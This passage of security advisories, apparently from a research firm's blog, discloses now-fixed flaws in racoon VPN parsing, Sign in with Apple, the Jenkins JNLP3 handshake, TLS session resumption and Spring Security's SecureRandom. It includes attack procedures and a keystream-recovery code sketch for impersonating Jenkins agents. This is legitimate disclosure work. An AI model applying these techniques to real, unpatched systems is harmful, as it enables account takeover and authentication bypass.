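For contrast, a hedged Python sketch of the loop shape with the missing checks added (struct isakmp_data consists of two 16-bit fields, so the header is 4 bytes; the top bit of the type is ISAKMP_GEN_MASK and marks fixed-size TV attributes):

HDR = 4            # sizeof(struct isakmp_data): 16-bit type + 16-bit lorv
GEN_MASK = 0x8000  # ISAKMP_GEN_MASK

def parse_attributes(buf):
    off, tlen = 0, len(buf)
    while tlen > 0:
        if tlen < HDR:                 # missing in racoon: the header itself must fit
            raise ValueError("truncated attribute header")
        typ = int.from_bytes(buf[off:off + 2], "big")
        lorv = int.from_bytes(buf[off + 2:off + 4], "big")
        size = HDR if typ & GEN_MASK else HDR + lorv
        if size > tlen:                # racoon compared lorv against tlen, forgetting HDR
            raise ValueError("truncated attribute value")
        # ... handle the attribute at buf[off:off + size] ...
        off, tlen = off + size, tlen - size
    # with the checks above, tlen is exactly 0 here; in racoon it could end up
    # negative, meaning the last iteration read past the end of the buffer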

In some cases where variable-length elements are used, the check that the buffer had enough data for the variable-length part was also slightly off, again due to failing to take the length of the current element's header into account. In the example above, on line 587 the code checks that len > tlen, but at that point the size of the element's header has not yet been subtracted from tlen (that only happens at line 753).

The end result was that in many places where packets are parsed, it was possible to read a couple of additional bytes from the buffer as if they were part of the packet. In many cases, it was possible to observe information about those bytes externally. For example, depending on the element type, the connection might be aborted if an out-of-bounds byte was 0x00.

These were fixed by Apple in iOS 13.5 (CVE-2020-9837).

Conclusion

VPNs are intended to offer security for users on an untrusted network. However, with the introduction of Network Extensions, the OS now also needs to protect itself against a potentially malicious VPN app. Properly securing an existing feature for such a new context is difficult. This is even more difficult due to the use of an existing, but abandoned, project. The way racoon is written, C code with complicated pointer arithmetic, makes spotting these bugs very difficult. It is very likely that more memory corruption bugs can be found in it.

Sign in with Apple - authentication bypass

1 July 2020 at 00:00

A couple of weeks ago we found a vulnerability that could be used to gain unauthorized access to an iCloud account, by abusing a new feature allowing TouchID to log in to websites.

In iOS 13 and macOS 10.15, Apple added the possibility to sign in on Apple’s own sites using TouchID/FaceID in Safari on devices which include the required biometric hardware.

When you visit any page with a login form for an Apple-account, a prompt is shown to authenticate using TouchID instead. If you authenticate, you’re immediately logged in. This skips the 2-factor authentication step you would normally need to perform when logging in with your password. This makes sense because the process can be considered to already require two factors: your biometrics and the device. You can cancel the prompt to log in normally, for example if you want to use a different AppleID than the one signed in on the phone.

We expect that the primary use case of this feature is not signing in on iCloud (it is pretty rare to use icloud.com in Safari on a phone); the main motivator was more likely “Sign in with Apple” on the web, for which this feature works as well. For those sites, additional options are shown when creating a new account, for example whether to hide your email address.

Although all of this works on both macOS and iOS, with TouchID and FaceID, and for all sites using AppleID logins, we’ll use iOS, TouchID and https://icloud.com to explain the vulnerability. Keep in mind that the impact is broader.

Logging in on Apple domains happens using OAuth2. On https://icloud.com, this uses the web_message mode. This works as follows when doing a normal login:

  1. https://icloud.com embeds an iframe pointing to https://idmsa.apple.com/appleauth/auth/authorize/signin?client_id=d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d&redirect_uri=https%3A%2F%2Fwww.icloud.com&response_mode=web_message&response_type=code.
  2. The user logs in (including steps such as entering a 2FA-token) inside the iframe.
  3. If the authentication succeeds, the iframe posts a message back to the parent window with a grant_code for the user using window.parent.postMessage(<token>, "https://icloud.com") in JavaScript.
  4. The grant_code is used by the icloud.com page to continue the login process.

Two of the parameters are very important in the iframe URL: the client_id and redirect_uri. The idmsa.apple.com server keeps track of a list of registered clients and the redirect URIs that are allowed for each client. In the case of the web_message flow, the redirect URI is not used as a real redirect, but instead it is used as the required page origin of the posted message with the grant code (the second argument for postMessage).

For all OAuth2 modes, it is very important that the authentication server validates the redirect URI correctly. If it does not do that, then the user’s grant_code could be sent to a malicious webpage instead. When logging in on the website, idmsa.apple.com performs that check correctly: changing the redirect_uri to anything else results in an error page.

When the user authenticates using TouchID, the iframe is handled differently, but the outer page remains the same. When Safari detects a new page with a URL matching the example URL above, it does not download the page, but it invokes the process AKAppSSOExtension instead. This process communicates with the AuthKit daemon (akd) to handle the biometric authentication and to retrieve a grant_code. If the user successfully authenticates then Safari injects a fake response to the pending iframe request which posts the message back, in the same way that the normal page would do if the authentication had succeeded. akd communicates with an API on gsa.apple.com, to which it sends the details of the request and from which it receives a grant_code.

What we found was that the gsa.apple.com API had a bug: even though the client_id and redirect_uri were included in the data submitted to it by akd, it did not check that the redirect URI matches the client ID. Instead, there was only a whitelist applied by AKAppSSOExtension on the domains: all domains ending in apple.com, icloud.com and icloud.com.cn were allowed. That may sound secure enough, but keep in mind that apple.com has hundreds (if not thousands) of subdomains. If any of these subdomains can somehow be tricked into running malicious JavaScript, it could be used to trigger the prompt for a login with the iCloud client_id, allowing that script to retrieve the user’s grant code if they authenticate. The page can then send it to an attacker, who can use it to obtain a session on icloud.com.
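
Sketched in Python, the difference between the suffix check that was applied and the per-client check that was missing (the registry contents are hypothetical; the client_id is the iCloud one from the URL above):

from urllib.parse import urlparse

# the only check actually applied (by AKAppSSOExtension): a domain suffix whitelist
def suffix_whitelist(redirect_uri):
    host = urlparse(redirect_uri).hostname or ""
    return any(host == d or host.endswith("." + d)
               for d in ("apple.com", "icloud.com", "icloud.com.cn"))

# the check gsa.apple.com should have applied: is this URI registered for this client?
REGISTERED = {
    "d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d": {"https://www.icloud.com"},
}

def grant_allowed(client_id, redirect_uri):
    return redirect_uri in REGISTERED.get(client_id, set())

print(suffix_whitelist("https://captive.apple.com/portal"))  # True: any apple.com subdomain passes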

Some examples of how that could happen:

  • A cross-site scripting vulnerability on any subdomain. These are found quite regularly: https://support.apple.com/en-us/HT201536 lists at least 30 candidates from 2019, and that just covers the domains that are important enough to investigate.
  • A dangling subdomain that can be taken over by an attacker. While we are not aware of any instances of this happening to Apple, recently someone found 670 subdomains of microsoft.com available for takeover: https://nakedsecurity.sophos.com/2020/03/06/researcher-finds-670-microsoft-subdomains-vulnerable-to-takeover/
  • A user visiting a page on any subdomain over HTTP. The important subdomains will have a HSTS header, but many will not. The domain apple.com is not HSTS preloaded with includeSubdomains.

The first two require the attacker to trick users into visiting the malicious page. The third requires that the attacker has access to the user’s local network. While such an attack is in general harder, it does allow a very interesting example: captive.apple.com. When an Apple device connects to a wifi-network, it will try to access http://captive.apple.com/hotspot-detect.html. If the response does not match the usual response, then the system assumes there is a captive portal where the user will need to do something first. To allow the user to do that, the response page is opened and shown. Usually, this redirects the user to another page where they need to login, accept terms and conditions, pay, etc. However, it does not need to do that. Instead, the page could embed JavaScript which triggers the TouchID login, which will be allowed as it is on an apple.com subdomain. If the user authenticates, then the malicious JavaScript receives the user’s grant_code.

The page could include all sorts of content to make the user more likely to authenticate, for example by making the page look like part of iOS itself or by showing a “Sign in with Apple” button. “Sign in with Apple” is still pretty new, so users might not notice that the prompt is slightly different than usual. Besides, many users will probably authenticate automatically when they see a TouchID prompt, as those are almost always about authenticating to the phone; it is not made obvious that users should also consider whether they want to authenticate to the page that opened the prompt.

By setting up a fake hotspot in a location where users expect to receive a captive portal (for example at an airport, hotel or train station), it would have been possible to gain access to a significant number of iCloud accounts, which would have allowed access to backups of pictures, location of the phone, files and much more. As we mentioned, this also bypasses the normal 2FA approve + 6-digit code step.

We reported this vulnerability to Apple, and they fixed it the same day they triaged it. The gsa.apple.com API now correctly checks that the redirect_uri matches the client_id. Therefore, this could be fixed entirely server-side.

It makes a lot of sense to us how this vulnerability could have been missed: people testing this will probably have focused on using untrusted domains for the redirect_uri. For example, sometimes it works to use https://www.icloud.com.attacker.com or https://attacker.com/https://www.icloud.com. In this case both fail; by trying just those, you would miss the ability to use a malicious subdomain.

The video below illustrates the vulnerability.

Jenkins - authentication bypass

30 January 2020 at 00:00

During a short review of the Jenkins source code, we found a vulnerability that can be used to bypass the mutual authentication when using the JNLP3 remoting protocol. In particular, this allows anyone to impersonate a client and thereby gain access to the information and functionality that should only be available to that client.

Technical Background

Jenkins supports 4 different versions of the remoting protocol. Versions 1 and 2 are unencrypted, version 3 uses a custom handshake protocol, and version 4 is secured using TLS. The vulnerability exists only in version 3.

Versions 1, 2 and 3 are deprecated, and warnings are shown when they are enabled. However, these warnings and the documentation only mention stability impact, not security impact such as a lack of authentication.

As described in the documentation in the code, the JNLP3 handshake works as follows:

src/main/java/org/jenkinsci/remoting/engine/JnlpProtocol3Handler.java#L80-L110

Client                                                                Master
          handshake ciphers = createFrom(agent name, agent secret)
 
  |                                                                     |
  |      initiate(agent name, encrypt(challenge), encrypt(cookie))      |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
  |                       encrypt(hash(challenge))                      |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                          GREETING_SUCCESS                           |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
  |                         encrypt(challenge)                          |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                       encrypt(hash(challenge))                      |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
  |                          GREETING_SUCCESS                           |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                          encrypt(cookie)                            |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                  encrypt(AES key) + encrypt(IvSpec)                 |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
 
             channel ciphers = createFrom(AES key, IvSpec)
          channel = channelBuilder.createWith(channel ciphers)

The encrypt function in this diagram uses keys that are derived from the client name and client secret. The exact procedure createFrom is not important for this issue, just that the keys only depend on the client name and secret and are therefore constant for all connections between that client and the master:

src/main/java/org/jenkinsci/remoting/engine/HandshakeCiphers.java#L108-L123

The encryption algorithm used is AES/CTR/PKCS5Padding:

src/main/java/org/jenkinsci/remoting/engine/HandshakeCiphers.java#L135

Vulnerability

As is commonly known, CTR mode must never be reused with the same keys and counter (IV): the encrypted value is generated by bytewise XORing a keystream with the plaintext data. When two different messages are encrypted using the same key and counter, the XOR of the two ciphertexts gives the XOR of the plaintexts as the keystream is canceled out. If one plaintext is known, this makes it possible to determine the keystream and the data in the second plaintext.

Each call to encrypt in the diagram above restarts the cipher, therefore, even when performing the handshake just once the keystream is reused multiple times.

Knowing the first ~2080 bytes of the AES-CTR keystream is enough to impersonate a client: the client needs to be able to decrypt the server’s challenge, which is around 2080 bytes. All other packets are smaller than that.
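
The core problem, demonstrated as a self-contained Python sketch (using the cryptography package; the messages are placeholders):

import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key, iv = os.urandom(16), os.urandom(16)

def encrypt(data):
    # every call restarts AES-CTR with the same key and counter, as in the JNLP3 handshake
    enc = Cipher(algorithms.AES(key), modes.CTR(iv)).encryptor()
    return enc.update(data) + enc.finalize()

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

known = b"a plaintext the attacker can predict, such as hash('')"
secret = b"any other handshake message"

keystream = xor(encrypt(known), known)   # one known pair reveals the keystream prefix
print(xor(encrypt(secret), keystream))   # b'any other handshake message'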

Exploitation

There are a number of ways to trick the server into encrypting a known plaintext, which allows an attacker to recover a part of the keystream, which can then be used to decrypt other packets. We describe a relatively efficient approach below, but many different (possibly more efficient) approaches are likely to exist.

The client can send an initiate packet with the challenge as an empty string. This means that the response from the server will always be the encryption of the SHA-256 hash of the empty string. This allows the attacker to recover the initial bytes of the keystream.

Then, the attacker can obtain the rest of the keystream byte by byte in the following way: the attacker sends a ciphertext that is exactly as long as the currently known keystream, plus one extra byte. The server will respond with one of 256 possible hashes, depending on how the extra byte was decrypted by the server. The attacker can decrypt the hash (because a large enough prefix of the keystream is already known from the previous step) and determine which byte the server had used, which can be XORed with the ciphertext byte to obtain the next keystream byte.
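
A hedged sketch of this loop; send_initiate() is a placeholder for one connection that submits our bytes as the encrypted challenge and returns the server's encrypt(hash(challenge)) reply, and xor() is as in the sketch above:

import hashlib

def recover_next_byte(keystream):
    n = len(keystream)
    ct = bytes(n + 1)                    # n known positions plus one probe byte, all zeros
    resp = send_initiate(ct)             # hypothetical helper: one handshake round-trip
    digest = xor(resp, keystream)[:32]   # decryptable, as we already know >= 32 keystream bytes
    for guess in range(256):
        if hashlib.sha256(xor(ct[:n], keystream) + bytes([guess])).digest() == digest:
            return guess                 # the probe ciphertext byte was 0, so keystream[n] == guess
    raise RuntimeError("byte swallowed by charset conversion; retry with another probe byte")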

There is one complication to this approach: in many places in the handshake binary data is for some unknown reason interpreted as ISO-8859-1 and converted to UTF8 or vice versa. This means that when the decrypted challenge ends in a character that is a partial UTF-8 multibyte sequence, the character is ignored. In that case, it is not possible to determine which character the server had decrypted. By trying at most 3 different bytes, it is possible to find one that is valid.

We have developed a proof-of-concept of this attack. Using this, we were able to retrieve enough bytes of the keystream to pass authentication with about 3000 connections to Jenkins, which took around 5 minutes against a local server. As mentioned, it is likely that this can be reduced even further.

It is also possible to perform a similar attack to impersonate a master against a client if the connection can be intercepted and the client automatically reconnects. We did not spend time performing this.

Recommendation

It is not possible to prevent this attack in a way that is backwards compatible with existing JNLP3 clients and masters. Therefore, we recommend removing support for JNLP3 completely. Arguably, the JNLP1 and JNLP2 protocols are safer to use, as those can only be taken over if a connection is intercepted. A safer, encrypted alternative already exists (JNLP4), so investing time in fixing this protocol is not needed.

Resolution

We reported the issue to the Jenkins team, who coincidentally were already considering removing support for the version 1, 2 and 3 remoting protocols as they are deprecated and were known to have stability impact. These protocols have now been removed in Jenkins 2.219. In version 2.204.2 of the LTS releases of Jenkins, this protocol can still be enabled by setting a configuration flag, but this is strongly discouraged.

Users using an older version of Jenkins can mitigate this issue by not enabling version 3 of the remoting protocol.

Timeline

2019-12-06 Issue reported to Jenkins as SECURITY-1682.
2019-12-06 Issue acknowledged by the Jenkins team.
2020-01-16 Fix prepared.
2020-01-29 Advisory published by Jenkins.
2020-01-30 This advisory published by Computest.

DNS rebinding for HTTPS

25 November 2019 at 00:00

A DNS rebinding attack is possible against a server that uses HTTPS by abusing TLS session resumption in a specific way.

In addition, the implementation of the Extended Master Secret extension in SChannel contained a vulnerability that made it ineffective.

Technical background

A DNS rebinding attack works as follows: an attacker A waits for a user C to visit the attacker’s website, say attacker.example. The DNS record for attacker.example initially points to an IP address of the attacker with a low TTL. Once the page is loaded, JavaScript repeatedly attempts to communicate back to attacker.example using the XMLHttpRequest API. As this is in the same origin, the attacker can influence almost everything about the request and can read almost every part of the response.

The attacker then updates this DNS record to point to a different server (not owned by A) instead. This means that the requests intended for attacker.example end up at a different server after the record expires, say, server.example owned by S. If this server does not check the HTTP Host header of the request, then it may accept and process it.

The proper way to prevent this attack is to ensure that web servers verify that the Host header on every request matches a host that is in use by that server. Another workaround that is commonly recommended is to use HTTPS, as the attack as described does not work with HTTPS: when the DNS record is updated and C connects to server.example, C will notice that the server does not present a valid certificate for attacker.example, therefore the connection will be aborted.
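
As an illustration of the server-side fix, the sketch below (using the JDK’s built-in com.sun.net.httpserver; the hostnames are placeholders) rejects any request whose Host header does not match a name the server is actually serving:

import com.sun.net.httpserver.HttpServer;
import java.net.InetSocketAddress;
import java.nio.charset.StandardCharsets;
import java.util.Set;

public class HostCheckDemo {
    // Hostnames this server is actually serving; anything else is rejected.
    static final Set<String> ALLOWED = Set.of("server.example", "www.server.example");

    public static void main(String[] args) throws Exception {
        HttpServer server = HttpServer.create(new InetSocketAddress(8080), 0);
        server.createContext("/", exchange -> {
            String host = exchange.getRequestHeaders().getFirst("Host");
            if (host != null) host = host.split(":", 2)[0]; // strip optional port
            if (host == null || !ALLOWED.contains(host)) {
                // A rebound request still carries the attacker's hostname
                // (e.g. attacker.example), so it fails this check.
                byte[] body = "Invalid Host header".getBytes(StandardCharsets.UTF_8);
                exchange.sendResponseHeaders(400, body.length);
                exchange.getResponseBody().write(body);
            } else {
                byte[] body = "Hello".getBytes(StandardCharsets.UTF_8);
                exchange.sendResponseHeaders(200, body.length);
                exchange.getResponseBody().write(body);
            }
            exchange.close();
        });
        server.start();
    }
}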

The most interesting scenarios for this attack involve attacking a device on the network (or even on the local machine) of C. This is due to a number of reasons, one of which is that such devices typically serve plain HTTP, so the HTTPS defence described above does not apply.

Attack

It is possible to perform a DNS rebinding attack against an HTTPS server by abusing TLS session resumption in a specific way. Contrary to the “normal” DNS rebinding attack, A needs to be able to communicate with S to establish a session that C will later resume. This attack is similar to the Triple Handshake attack (3SHAKE); however, the measures taken by TLS implementations in response to that attack do not adequately defend against this one.

Just like in the 3SHAKE attack, A can set up two connections C -> A and A -> S that have the same encryption keys and then pass the session ID or session ticket from S on to C. This is known as an “unknown key-share attack”. Contrary to the 3SHAKE attack, however, A can update the DNS record for attacker.example before the session is resumed. TLS resumption does not re-transmit the server’s certificate; both endpoints assume that the certificate is the same as for the previous connection. Therefore, when C resumes the connection at S, C assumes it has an encrypted connection authenticated by attacker.example, while S assumes it has sent the certificate for server.example on this connection.

To any web applications running on S, the connection will appear to be originating from C’s IP address. If the website on server.example has functionality that is IP restricted to only be available to C, then A will be able to interact with this functionality on behalf of C.

In more detail:

  1. C opens a connection to A, using client random r1 in the ClientHello message.

  2. A opens a connection to S, using the same client random r1. A advertises only the ciphers C included that use RSA key exchange and A does not advertise the “extended master secret” TLS extension.

  3. S replies to A with server random r2 and session ID s in the ServerHello message.

  4. A replies to C with server random r2 and session ID s and the same cipher suite as chosen for the other connection, but A’s own certificate. A makes sure that the extended master secret extension is not enabled here either.

  5. C sends an encrypted pre-master secret to A. A decrypts this value using the private RSA key corresponding to A’s certificate to obtain its value, p.

  6. A also sends p in a ClientKeyExchange to S, now encrypted with the public key of S.

  7. Both connections finish. The master secret for both is derived only from r1, r2 and p; therefore, the secrets are identical. A knows this master secret, so it can cleanly finish both handshakes and exchange data on both connections (see the sketch after this list).

  8. A sends a page containing JavaScript to C.

  9. A updates the DNS record for attacker.example to point to S’s IP address instead.

  10. A closes the connections with C and S.

  11. Due to an XHR request from A’s JavaScript, C will reconnect. It receives the new DNS record and therefore resumes the connection at S, which works because S recognises the session ID and the keys match. As it is a resumption, the certificate message is skipped.

  12. JavaScript from A can now send HTTP requests to S within the origin of attacker.example.
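
The crux is step 7. The following sketch of the TLS 1.2 PRF (RFC 5246, HMAC-SHA256 based) shows that, without EMS, the master secret is computed from nothing but the pre-master secret and the two random values, all of which A knows or copies between the two connections; nothing about the certificates is mixed in (the zeroed inputs below stand in for the values A observes and relays):

import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public class MasterSecretDemo {
    // TLS 1.2 PRF (RFC 5246): P_SHA256(secret, label + seed), truncated to `length`.
    static byte[] prf(byte[] secret, String label, byte[] seed, int length) throws Exception {
        Mac hmac = Mac.getInstance("HmacSHA256");
        hmac.init(new SecretKeySpec(secret, "HmacSHA256"));
        byte[] labelSeed = concat(label.getBytes("US-ASCII"), seed);

        byte[] out = new byte[length];
        byte[] a = labelSeed; // A(0) = seed
        int off = 0;
        while (off < length) {
            a = hmac.doFinal(a); // A(i) = HMAC(secret, A(i-1))
            byte[] block = hmac.doFinal(concat(a, labelSeed));
            int n = Math.min(block.length, length - off);
            System.arraycopy(block, 0, out, off, n);
            off += n;
        }
        return out;
    }

    static byte[] concat(byte[] x, byte[] y) {
        byte[] r = new byte[x.length + y.length];
        System.arraycopy(x, 0, r, 0, x.length);
        System.arraycopy(y, 0, r, x.length, y.length);
        return r;
    }

    public static void main(String[] args) throws Exception {
        byte[] p = new byte[48];  // pre-master secret, known to A in the RSA case
        byte[] r1 = new byte[32]; // client random, copied by A onto both connections
        byte[] r2 = new byte[32]; // server random, copied by A onto both connections

        // Only p, r1 and r2 go in, so the C->A and A->S connections derive
        // the same 48-byte master secret.
        byte[] master = prf(p, "master secret", concat(r1, r2), 48);
        System.out.println("master secret length: " + master.length);
    }
}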

Cipher selection

A can force the use of a specific cipher suite on the first two connections, assuming both C and S support it. It can indicate support for only the desired cipher suite(s) on the connection A -> S and then select the same cipher suite on the C -> A connection.

When a session is resumed, the same cipher suite is used as for the original connection. Because A removed certain cipher suites, the ClientHello used for resumption will almost certainly advertise stronger ciphers than the one the original connection used. A server could detect this and decide to perform a full handshake instead, so that a stronger cipher suite is negotiated. It appears that few servers actually do this.

Extended master secret

In response to the 3SHAKE attack, the extended master secret (EMS) extension was added to TLS in RFC 7627. This extension appears to be implemented by most browsers, however, support on servers is still limited. This extension would make the Unknown Key-Share attack impossible, as the full contents of the initial handshake messages (including the certificates) are included in the master secret computation, not just the random values.

The attack is impossible if both client and server support EMS and enforce its usage. However, as server support is limited (browser) clients currently do not require it.

When the extension is not required but supported by both the client and the server, it could be used to detect the above attack and refuse resumption (making the attack impossible as well). If the server receives a ClientHello that indicates support for EMS and which attempts to resume a session that did not use EMS, it must refuse to resume it and perform a full handshake instead.

This is described in RFC 7627 as follows:

 o  If the original session did not use the "extended_master_secret"
    extension but the new ClientHello contains the extension, then the
    server MUST NOT perform the abbreviated handshake.  Instead, it
    SHOULD continue with a full handshake (as described in
    Section 5.2) to negotiate a new session.

This is, however, not universally followed by servers. Most notably, we found that IIS indicates support for EMS in the full-handshake ServerHello, but when it receives a ClientHello that indicates support for EMS and requests resumption of a session that did not use EMS, IIS allows the resumption. We also found that servers hosted by the Fastly CDN were vulnerable in the same way.

The attack also works when the server does not support EMS, but the client does. The Interoperability Considerations in §5.4 of RFC 7627 only say the following about that:

 If a client or server chooses to continue an abbreviated handshake to
 resume a session that does not use the extended master secret, then
 the current connection becomes vulnerable to a man-in-the-middle
 handshake log synchronisation attack as described in Section 1.
 Hence, the client or server MUST NOT use the current handshake's
 "verify_data" for application-level authentication.  In particular,
 the client MUST disable renegotiation and any use of the "tls-unique"
 channel binding [RFC5929] on the current connection.

This section only highlights risks for renegotiation and channel binding on this connection. The ability to perform a DNS rebinding attack does not seem to have been considered here. To address that risk, the only option is to not resume connections for which EMS was not used and for which the remote IP address has changed.

Other configurations

The sequence of handshake messages is different when session tickets are used instead of ID-based resumption, but the attack works in much the same way.

While the example above uses the RSA key exchange, as noted in the 3SHAKE research the DHE and ECDHE key exchanges are also affected if the client accepts arbitrary DHE groups or ECDHE curves and does not verify that these are secure. Support for DHE has been removed from all common browsers (except Firefox), and arbitrary ECDHE curves appear never to have been supported in browsers. When using Curve25519, certain “non-contributory” points can be used to force a specific shared secret; the TLS implementations we looked at correctly reject those points.

TLS 1.3 is not affected, as in that version the EMS extension is incorporated into the design.

SNI also influences the process. On the initial connection, the attacker can pick the name indicated via SNI. While a large portion of webservers is configured to reject unknown Host headers, we found almost no HTTPS servers that reject the handshake when an unknown SNI name is received; servers most often reply with a “default” certificate. We found that some servers require the SNI name for a resumption to be equal to the SNI name of the original connection. If this is not the case, it may be possible to change the selected virtual host based on the SNI name of the first connection, though we did not find a server configured like this in practice.

It may also be possible for A to send a client certificate to S on the first connection, and then attribute the messages sent after the resumption to A’s identity. We did not find a concrete attack that would be possible using this, but for other protocols that rely on TLS it may be an issue.

The attack as described relies on A updating their DNS record. Even with a minimal TTL, it may take a long time for all caches to obtain the updated record. However, this is not strictly required for the attack: A can include two IP addresses in the A/AAAA record, the first being A’s own address, the second the address of the victim. Once A has delivered the JavaScript and the session ID/ticket, A can reject connections from the user (by sending a TCP RST response), causing the browser to fall back to the second IP address and therefore connect to S instead.

Exploitation

We wrote a tool that accepts TLS connections and performs the attack by establishing a connection to a remote server with the same master secret and forwarding the session ID. By subsequently refusing connections, it was possible to cause browsers to resume their sessions at the remote server instead.

We have performed this attack successfully against the following browsers:

  • Safari 12.1.1 on macOS 10.14.5.
  • Chrome 74.0.3729.169 on macOS 10.14.5.
  • Safari on iOS 12.3.
  • Microsoft Edge 44.17763.1.0 on Windows 10.
  • Chrome 74.0.3729.169 on Windows 10.
  • Internet Explorer 11 on Windows 7.
  • Chrome 74.0.3729.61 on Android 10.

As mentioned, we also found the following server vulnerable to allowing a resumption of a non-EMS connection using an EMS ClientHello:

  • IIS 10.0.17763.1 on Windows 10.

Firefox is (currently) not vulnerable, as its TLS session storage separates sessions by remote IP address and will not attempt to resume if the IP address has changed. (https://bugzilla.mozilla.org/show_bug.cgi?id=415196)

Impact

To summarise, this vulnerability can be used by an attacker to bypass IP restrictions on a web application, provided that the web server:

  • supports TLS session resumption;
  • does not support the EMS TLS extension (or does not enforce it, like IIS);
  • can be connected to by an attacker;
  • does not verify the Host header on requests or the targeted web application is the fallback virtual host;
  • has functionality that is restricted based on IP address.

As it cannot be determined automatically whether a website has functionality that is IP restricted, we could not determine the exact number of vulnerable websites. Based on a scan of the top 1M most popular websites, we estimate that about 30% of webservers fulfil the first two requirements.

Resolution

Chrome 77 will not allow TLS sessions to be resumed if the RSA key exchange is used and the remote IP address has changed.

SChannel (IE/Edge) in update KB4520003 will no longer resume TLS sessions if EMS was not used; in addition, its server-side implementation of EMS was fixed to no longer allow non-EMS sessions to be resumed using an EMS handshake.

Safari in macOS Catalina (10.15) will not allow TLS sessions to be resumed if the remote IP address has changed.

Fastly has fixed their TLS implementation to also not allow non-EMS sessions to be resumed using an EMS-handshake.

Due to these changes, servers may notice a decrease in the percentage of sessions that are successfully resumed. In order to maximise the chance of successful resumption, servers should make sure that:

  • Cipher suites using RSA key exchange are only used if ECDHE is not supported by the client.
  • The Extended Master Secret extension is supported and enabled by the server.
  • Clients connect to the same server IP address as much as possible, for example by ensuring the TTL of DNS responses is high if multiple IP addresses are used.

When using TLS 1.3, the RSA key exchange is no longer allowed and Extended Master Secret has become part of the design instead of an extension. Therefore, the first two recommendations are no longer needed.

Timeline

2019-06-03 Report sent to Google, Apple, Microsoft.
2019-07-01 Fix committed for Chromium.
2019-07-15 EMS problem reported to Fastly.
2019-07-30 Fix by Fastly deployed and confirmed.
2019-09-11 Chrome 77 released with the fix.
2019-10-07 macOS Catalina released with the fix.
2019-10-08 Update KB4520003 released by Microsoft with the fix.

Spring Security - insufficient cryptographic randomness

4 July 2019 at 00:00

The SecureRandomFactoryBean class in Spring Security by Pivotal has a vulnerability in certain versions that could lead to the generation of predictable random values when a custom seed is supplied. This contradicts the documentation, which states that adding a custom seed does not decrease the entropy. The cause of this bug is incorrect use of the Java SecureRandom API. The vulnerability could lead to predictable keys or tokens in applications that depend on cryptographically secure randomness. It was fixed by Pivotal by ensuring that proper seeding always takes place.

Applications that use this class may need to evaluate if any predictable tokens were generated that should be revoked.

Technical Background

The SecureRandom class in Java offers a cryptographically secure pseudo-random number generator. It is often the best method in Java for generating keys, tokens or nonces for which unpredictability is critical. When using this class, multiple algorithms may be available. An explicit algorithm can be selected by calling (for example) SecureRandom.getInstance("SHA1PRNG"). The seeding of an instance created this way happens as soon as the first bytes are requested, not during creation.

Normally, when calling setSeed() on a SecureRandom instance, the seed is incorporated into the state to supplement its randomness. However, when calling setSeed() on an instance newly created with an explicit algorithm, there is no state yet; the seed therefore sets the entire state, and no other entropy is used.
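
The following sketch demonstrates the difference, assuming the SUN provider’s SHA1PRNG implementation:

import java.security.SecureRandom;
import java.util.Arrays;

public class SeedDemo {
    public static void main(String[] args) throws Exception {
        byte[] seed = "fixed seed".getBytes("UTF-8");

        // Two SHA1PRNG instances seeded with the same bytes *before* any
        // output was requested: the seed replaces the entire state.
        byte[] a = deterministic(seed);
        byte[] b = deterministic(seed);
        System.out.println(Arrays.equals(a, b)); // true: fully predictable

        // Requesting output first forces self-seeding from the system
        // entropy source; a later setSeed() then only supplements the state.
        SecureRandom safe = SecureRandom.getInstance("SHA1PRNG");
        safe.nextBytes(new byte[1]); // triggers self-seeding
        safe.setSeed(seed);          // supplements, does not replace
    }

    static byte[] deterministic(byte[] seed) throws Exception {
        SecureRandom rnd = SecureRandom.getInstance("SHA1PRNG");
        rnd.setSeed(seed); // no prior output: the state is exactly this seed
        byte[] out = new byte[16];
        rnd.nextBytes(out);
        return out;
    }
}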

This is mentioned in the documentation for SecureRandom.getInstance():

https://docs.oracle.com/javase/7/docs/api/java/security/SecureRandom.html

The returned SecureRandom object has not been seeded. To seed the returned
object, call the setSeed method. If setSeed is not called, the first call to
nextBytes will force the SecureRandom object to seed itself. This self-
seeding will not occur if setSeed was previously called.

This text is misleading: the first two sentences may give the impression that the instance is unsafe to use without seeding, while for almost all applications the self-seeding is in fact much safer than supplying a seed.

This is a well-known design flaw that can lead to incorrect use, and it has been discussed before:

https://stackoverflow.com/a/27301156

You should never call setSeed before retrieving data from the "SHA1PRNG" in
the SUN provider as that will make your RNG (Random Number Generator) into a
Deterministic RNG - it will only use the given seed instead of adding the
seed to the state. In other words, it will always generate the same stream
of pseudo random bits or values.

Google noticed that on Android some apps depend on this unexpected usage, which made it difficult to change the behaviour.

https://android-developers.googleblog.com/2016/06/security-crypto-provider-deprecated-in.html

A common but incorrect usage of this provider was to derive keys for
encryption by using a password as a seed. The implementation of SHA1PRNG had
a bug that made it deterministic if setSeed() was called before obtaining
output.

Vulnerability

The SecureRandomFactoryBean class in spring-security returns a SecureRandom object created with SHA1PRNG as the explicit algorithm. Optionally, a Resource can be set as a seed:

security/core/token/SecureRandomFactoryBean.java#L37-L52

public SecureRandom getObject() throws Exception {
    SecureRandom rnd = SecureRandom.getInstance(algorithm);

    if (seed != null) {
        // Seed specified, so use it
        byte[] seedBytes = FileCopyUtils.copyToByteArray(seed.getInputStream());
        rnd.setSeed(seedBytes);
    }
    else {
        // Request the next bytes, thus eagerly incurring the expense of default
        // seeding
        rnd.nextBytes(new byte[1]);
    }

    return rnd;
}

The documentation of SecureRandomFactoryBean.setSeed() states (contradictory to the documentation of SecureRandom itself):

Allows the user to specify a resource which will act as a seed for the
SecureRandom instance. Specifically, the resource will be read into an
InputStream and those bytes presented to the SecureRandom.setSeed(byte[])
method. Note that this will simply supplement, rather than replace, the
existing seed. As such, it is always safe to set a seed using this method
(it never reduces randomness).

